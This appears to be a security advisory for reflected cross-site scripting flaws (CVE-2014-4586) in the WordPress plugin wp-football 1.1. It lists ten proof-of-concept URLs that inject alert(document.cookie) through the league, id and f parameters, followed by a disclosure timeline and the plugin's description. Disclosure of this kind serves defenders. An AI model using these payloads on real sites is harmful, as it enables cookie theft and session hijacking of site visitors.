wp-plugin : wp-football | Code Vigilant : to err is human.. To fix is Humanity

wp-plugin : wp-football
Plugin Details

Plugin Name: wp-plugin : wp-football

Effected Version : 1.1 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Identified by : anantshri

WPScan Reference URL

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/wp-football/football_classification.php?league=league"&gt;alert(document.cookie)&amp;group=group

http://localhost/wp-content/plugins/wp-football/football_criteria.php?league=league'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football-functions.php?ajax=1&id_group=id_group&id_league=id_league&f=f'>alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_groups_list.php?action=action&amp;paged=paged&amp;id=id"&gt;alert(document.cookie)&amp;byajax=byajax

http://localhost/wp-content/plugins/wp-football/football_matches_list.php?action=action&amp;paged=paged&amp;id=id"&gt;alert(document.cookie)&amp;

http://localhost/wp-content/plugins/wp-football/football_matches_load.php?action=delete&amp;paged=paged&amp;id_group=id_group&amp;id_league=id_league"&gt;alert(document.cookie)&amp;id_phase=id

http://localhost/wp-content/plugins/wp-football/football_matches_phase.php?action=action&amp;paged=paged&amp;id=id"&gt;alert(document.cookie)&amp;id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_phases_list.php?action=action&amp;paged=paged&amp;id=id"&gt;alert(document.cookie)&amp;

http://localhost/wp-content/plugins/wp-football/templates/template_default_preview.php?league=league"&gt;alert(document.cookie)&amp;

http://localhost/wp-content/plugins/wp-football/templates/template_worldCup_preview.php?league=league"&gt;alert(document.cookie)&amp;

Vulnerable Parameters : league, id, f

Disclosure Timeline

Vendor Contacted : 2014-01-17

Plugin Status : Updated on

Public Disclosure : June 12, 2014

CVE Number : CVE-2014-4586

Plugin Description :

[|
    	Administer football (soccer) championships.
    
    = Features =
    
    * Complete table of the World Cup 2010. Built to activate the plugin - in Portuguese or English according to the language defined in WP;
    * The League table or part may be published through widgets or posts / pages. See how in the item "Frequently Asked Questions";
    * In the Templates submenu you can configure the fields to be displayed so you can fit the layout of your theme. Currently are available the templates of the Cup and of two widgets - compact and extended versions. The templates are created in the activation of the plugin;
    * Has uninstaller, developed based on WP-Email plugin of [Lester 'GaMerZ' Chan](http://lesterchan.net/);
    * Automatically calculates, from the classification criteria, classification of teams per group when is informed the result of a match.
    
    All the information you need about this plugin can be found in Plugin Homepage.	
]